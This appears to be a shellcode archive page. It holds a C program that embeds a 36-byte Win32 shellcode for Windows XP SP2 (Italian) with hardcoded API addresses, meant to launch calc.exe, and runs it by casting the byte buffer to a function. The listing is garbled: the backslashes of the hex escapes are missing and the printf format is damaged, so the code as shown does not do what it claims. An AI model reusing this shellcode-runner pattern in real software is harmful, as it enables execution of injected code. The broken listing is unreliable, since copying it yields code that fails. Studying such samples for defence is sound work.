[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Windows XP Professional SP2 ita calc.exe shellcode 36 bytes
# Published : 2010-03-11
# Author : Stoke
# Previous Title : Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes
# Next Title : JITed exec notepad Shellcode


/*
Title: Windows XP Professional SP2 ita calc.exe shellcode 36 bytes
Type: Shellcode
Author: Stoke
Platform: win32
Tested on: Windows XP Professional SP2 ita
*/

#include <stdio.h>
#include <string.h>

int main() {
char shell[] = "xebx16x5bx31xc0x50x53xbb"
"x8dx15x86x7cxffxd3x31xc0"
"x50xbbxeaxcdx81x7cxffxd3"
"xe8xe5xffxffxffx63x61x6c"
"x63x2ex65x78x65";
printf("Shellcode lenght %dn", strlen(shell));
getchar();
((void (*)()) shell)();
return 0;
}